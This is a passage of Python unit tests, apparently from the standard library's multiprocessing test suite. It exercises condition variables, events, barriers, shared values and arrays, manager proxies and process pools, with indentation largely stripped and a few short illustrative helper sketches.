p.daemon = True
p.start()
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
for i in range(10):
try:
if get_value(woken) == 6:
break
except NotImplementedError:
break
time.sleep(DELTA)
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
p.join(5)
self.assertFalse(p.is_alive())
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.time()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.time() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=10))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
p.join(5)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(10))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 10)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
f(*args)
b.wait_for_finished()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
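# Illustrative sketch (not part of the test suite; the helper name is ours):
# the core of the multiprocessing.Value API that _TestValue below exercises.
# A ctypes typecode plus an initial value gives a shared object, synchronized
# by an internal lock unless lock=False or RawValue is used.  Requires ctypes,
# like the tests below.
def _example_shared_value():
    import multiprocessing
    counter = multiprocessing.Value('i', 0)   # shared C int, initial value 0
    with counter.get_lock():                  # the default wrapper carries a lock
        counter.value += 1
    return counter.value                      # 1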
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
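# Brief sketch (not used by the tests): the two Array construction forms that
# test_array() and test_array_from_size() above rely on -- an integer size
# gives a zero-initialized block, while a sequence argument copies its
# contents.
def _example_shared_array():
    import multiprocessing
    zeros = multiprocessing.Array('i', 5)            # five zero-initialized ints
    filled = multiprocessing.Array('i', [1, 2, 3])   # copies the sequence
    return list(zeros), list(filled)                 # ([0, 0, 0, 0, 0], [1, 2, 3])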
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
e[:],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[:], [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello']])
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
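# Minimal sketch (illustration only, not invoked by the suite): the manager
# proxies exercised by _TestContainers above.  Proxy objects forward
# operations to the manager process, so mutations made here are visible to
# other processes holding the same proxy.
def _example_manager_containers():
    import multiprocessing
    with multiprocessing.Manager() as manager:
        shared_list = manager.list(range(3))
        shared_dict = manager.dict(a=1)
        shared_list.append(3)
        shared_dict['b'] = 2
        return list(shared_list), dict(shared_dict)   # ([0, 1, 2, 3], {'a': 1, 'b': 2})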
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
    def test_map_unpicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(1000)))
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=53)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
self.assertRaises(ValueError, multiprocessing.Pool, -1)
self.assertRaises(ValueError, multiprocessing.Pool, 0)
p = multiprocessing.Pool(3)
self.assertEqual(3, len(p._pool))
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
self.assertLess(join.elapsed, 0.5)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with multiprocessing.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
        # We want to ensure that the traceback from the child process is
        # contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
raise AssertionError('expected RuntimeError')
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.time()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.time() - t_start, 0.9)
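# Small sketch (not invoked here): the Pool idioms covered above -- the pool
# as a context manager, as in test_context(), plus map() and imap() with an
# explicit chunksize.  Reuses the module-level sqr() helper.
def _example_pool_usage():
    import multiprocessing
    with multiprocessing.Pool(2) as pool:
        squares = pool.map(sqr, range(5), chunksize=2)   # [0, 1, 4, 9, 16]
        streamed = list(pool.imap(sqr, range(5)))        # same values, lazily
    return squares, streamed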
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# If the manager process exited cleanly then the exitcode
# will be zero. Otherwise (after a short timeout)
# terminate() is used, resulting in an exitcode of -SIGTERM.
self.assertEqual(manager._process.exitcode, 0)
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
